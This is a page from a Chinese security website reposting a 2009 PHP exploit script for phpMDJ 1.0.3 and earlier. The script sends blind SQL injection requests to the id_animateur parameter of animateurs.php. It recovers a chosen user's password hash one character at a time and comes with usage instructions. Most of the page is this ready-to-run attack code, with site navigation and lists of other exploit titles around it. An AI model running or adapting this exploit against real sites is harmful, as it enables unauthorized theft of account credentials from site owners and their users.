首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
phpMDJ <= 1.0.3 (id_animateur) Blind SQL Injection Exploit
来源:http://darkjoker.net23.net 作者:darkjoker 发布时间:2009-01-12  

--+++=========================================================+++--
--+++====== phpMDJ <= 1.0.3 Blind SQL Injection Exploit ======+++--
--+++=========================================================+++--

<?php

function query ($usr, $chr, $pos)
{
 $query = "x' OR ASCII(SUBSTRING((SELECT mdp FROM phpmdj_users WHERE pseudo = '{$usr}'),{$pos},1))={$chr} OR '1' = '2";
 $query = str_replace (" ", "%20", $query);
 $query = str_replace ("'", "%27", $query);
 return $query;
}

function exploit ($hostname, $path, $usr, $chr, $pos)
{
 $chr = ord ($chr);

 $fp = fsockopen ($hostname, 80);

 $query = query ($usr, $chr, $pos);
 $request = "GET {$path}/animateurs.php?id_animateur={$query} HTTP/1.1\r\n".
     "Host: {$hostname}\r\n".
     "Connection: Close\r\n\r\n";

 fputs ($fp, $request);

 while (!feof ($fp))
  $reply .= fgets ($fp, 1024);
 
 fclose ($fp);
 preg_match ("/Les animateurs<\/a> :(.+)<\/h2>/", $reply, $x);

 if (strlen (trim ($x [1])) == 0)
  return false;
 else
  return true;
}

function usage ()
{
 echo
  "\n[+] phpMDJ <= 1.0.3 Blind SQL Injection Exploit".
  "\n[+] Author: darkjoker".
  "\n[+] Site  : http://darkjoker.net23.net".
  "\n[+] Usage : php xpl.php <hostname> <path> <username>".
  "\n[+] Ex.   : php xpl.php localhost /phpMDJ admin".
  "\n\n";
 exit ();
}

if ($argc != 4)
 usage ();

$hostname = $argv [1];
$path = $argv [2];
$user = $argv [3];
$key = "abcdef0123456789";
$pos = 1;
$chr = 0;

echo "[+] Password: ";

while ($pos <= 32)
{
 if (exploit ($hostname, $path, $user, $key [$chr], $pos))
 {
  echo $key [$chr];
  $chr = -1;
  $pos++;
 }
 $chr++;
}

echo "\n\n";


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Browse3D 3.5 (.sfs File) Local
·Microsoft HTML Workshop <= 4.7
·MS Windows (.CHM File) Denial
·Microsoft HTML Workshop <= 4.7
·Joomla com_jashowcase (catid)
·Silentum Uploader 1.4.0 Remote
·Joomla com_xevidmegahd (catid)
·Simple Machines Forum - Destro
·Microsoft HTML Workshop <= 4.7
·Comersus Shopping Cart <= v6 R
·VUPlayer 2.49 .ASX File (HREF)
·Triologic Media Player 7 (.m3u
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved